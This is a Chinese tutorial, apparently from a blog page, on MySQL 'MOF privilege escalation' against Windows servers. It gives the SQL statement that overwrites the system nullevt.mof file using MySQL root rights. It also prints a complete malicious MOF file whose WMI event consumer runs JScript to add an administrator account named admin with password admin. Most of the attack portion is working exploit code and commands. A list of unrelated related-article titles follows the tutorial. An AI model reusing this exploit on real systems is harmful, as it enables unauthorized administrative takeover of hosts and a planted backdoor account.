mof提权的原理:

mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。

以下是mof提权的过程:

将mof上传至任意可读可写目录下,这里我传到D:\wamp\下命名为:xishaonian.mof。也就是:D:\wamp\xishaonian.mof

然后使用sql语句将系统当中默认的nullevt.mof给替换掉。进而让系统执行我们这个恶意的mof文件。

替换的sql语句:select load_file('D:\wamp\xishaonian.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

mof文件代码如下所示:

#pragma namespace("\\\\.\\root\\subscription") instance of __EventFilteras$EventFilter

{

EventNamespace= "Root\\Cimv2";

Name= "filtP2";

Query= "Select * From __InstanceModificationEvent"

"Where TargetInstance Isa \"Win32_LocalTime\""

"And TargetInstance.Second = 5";

QueryLanguage= "WQL";

};

instance of ActiveScriptEventConsumeras$Consumer

{

Name= "consPCSV2";

ScriptingEngine= "JScript";

ScriptText=

"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";

};

instance of __FilterToConsumerBinding

{

Consumer=$Consumer;

Filter=$EventFilter;

};

可见其中是有一段添加用户的脚本。账号为admin 密码为admin

THE END

mysql mof提权原理_mof提权原理及其过程相关推荐

  1. mysql mof提权原理_mof提权原理及实现

    关于 mof 提权的原理其实很简单,就是利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的c ...

  2. mysql mof提权原理_Mof提权科普

    首先呢先谢谢米爷在我弄这个的时候把我骂开窍了- -. 不多说了~.~像名称一样哈~ 首先呢是朋友扔我一shell 他提权差就给咱了,简单的看了下,是php脚本的,一看php脚本就肯定带有,mysql. ...

  3. mysql udf提权原理_udf提权原理详解

    0x00-前言 这个udf提权复现搞了三天,终于搞出来了.网上的教程对于初学者不太友好,以至于我一直迷迷糊糊的,走了不少弯路.下面就来总结一下我的理解. 想要知道udf提权是怎么回事,首先要先知道ud ...

  4. 一文了解提权:溢出提权和第三方组件提权

    前言 对提权做个归纳 提权一般分为两种: 溢出提权 第三方组件提权 一.溢出提权 溢出提权就是利用系统漏洞进行提权 远程溢出:攻击者只要与服务器连接,然后根据漏洞使用响应的exp即可,如著名的MS-0 ...

  5. 提权学习:第三方软件提权(巴西烤肉提权和启动项提权)

    当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 巴西烤肉提权 启动项提权 0x01 启动项提权 0x02 启动项提权,拓展知识 [写入启动项提权/启动项里提权] 巴西烤肉提权 首先,基本 ...

  6. Day1——提权学习之提权基础

    0x00 提权技术分类 大概分为三种: 1.系统溢出漏洞提权 2.数据库提权 3.第三方软件提权 0x01 通常脚本所处的权限 1.asp / php 匿名权限(网络服务权限) 2.aspx user ...

  7. oracle用户获取datameta权限,Oracle数据库提权(低权限提升至dba)

    0x01 Oracle存储过程"缺陷" 在 Oracle 的存储过程中,有一个有趣的特点:运行权限.运行权限分为两种,definer 和 invoker. definer 为函数创 ...

  8. 第三方组件提权-SQL server提权

    文章目录 基础 MSSQL权限级别 拿webshell xp_cmdshell执行系统命令 LOG备份getshell 提权 使用xp_cmdshell进行提权 以下内容为转载 使用sp_oacrea ...

  9. CobaltStrike使用-第五篇(Bypass UAC、CVE提权、Powerup提权)

    前四篇文章介绍了CS的基本使用方法和模块,以及钓鱼攻击的方法,本篇将会介绍使用CS进行提权操作 文章目录 权限提升 Bypass UAC CVE提权 PowerUp 凭证和哈希获取 Beacon 中的 ...

最新文章

  1. 写给那些在技术路上奔跑的人们!!!!!
  2. Py之torchvision:torchvision库的简介、安装、使用方法之详细攻略
  3. fragment+viewpager+tablayou实现滑动切换页面
  4. idea无法导入主题jar包_总结IDEA开发的26个常用设置
  5. nginx与IIS服务器搭建集群实现负载均衡(二)
  6. python字符串 切片_Python切片字符串
  7. EasyRecovery---U盘数据恢复技巧
  8. Windows系统性能分析
  9. 佳能g2810提示5b00_佳能G2810 3800系列出现5B00如何解决
  10. 家庭财务管理系统的设计与实现(Java毕业设计-Springboot)
  11. 中文期刊分类(blog版)
  12. 给儿子的一封信——大学才是人生真正的起点
  13. 如何使用真机测试运行HarmonyOS应用
  14. 【MySQL基础】MySQL介绍及安装
  15. 1873. 计算特殊奖金
  16. CMDN CLUB第14场:小米与友盟专家详解Android开发:
  17. 玩机搞机----mtk芯片机型 另类制作备份线刷包的方式 读写分区等等
  18. 《机器学习实战:基于Scikit-Learn、Keras和TensorFlow第2版》-学习笔记(8):降维
  19. @Inject和@Named
  20. ARM开发板如何安装Linux系统

热门文章

  1. 从小破站到大B站:哔哩哔哩变味了?
  2. 高思教育获华平领投1.4亿美元D轮融资,发力B端全面开启平台化战略...
  3. html入门(九)—— 浮动框架(iframe)
  4. 2021年中国数字教育行业发展规模及未来发展趋势分析[图]
  5. 只有技能精进,才能无惧寒冬
  6. 象棋小程序2-棋子移动
  7. 22081-12-12 系统移植(TF-A移植和linux操作系统开发阶段流程总结)
  8. 浅析koa路由及其中间件
  9. NLP 结巴分词词性映射关系
  10. 公众号强制排名被动引流截流 I 骚操作直接利用平台转化收钱原创 桔子wang